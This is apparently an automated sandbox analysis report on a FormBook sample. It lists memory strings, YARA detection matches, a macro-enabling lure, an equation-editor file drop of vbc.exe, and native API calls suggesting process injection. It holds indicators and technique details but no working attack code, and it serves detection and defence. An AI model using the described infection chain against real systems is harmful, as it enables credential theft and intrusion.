          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2202476584.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2201932167.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000002.2393313509.0000000000260000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above Q 16 , 17 18 :496$ J6'KvC 19 20 21 5 ( 5690 ( 2
          Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above Q 16 , 17 18 :496$ J6'KvC 19 20 21 5 ( 5690 ( 2
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\help.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D042D0 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00D042C8 NtQueryInformationProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181B0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418260 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182E0 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182AC NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041838B NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00920048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00920078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009210D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00920060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009201D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0092010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00921148 NtOpenThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00921930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091F938 NtWriteFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FAB8 NtQueryValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FA20 NtQueryInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FA50 NtEnumerateValueKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FBE8 NtQueryVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FB50 NtCreateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FC30 NtOpenProcess,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00920C40 NtGetContextThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FC48 NtSetInformationFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00921D80 NtSuspendThread,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FD5C NtEnumerateKey,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FE24 NtWriteVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FFFC NtCreateProcessEx,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0091FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_007A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 7_2_0079FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
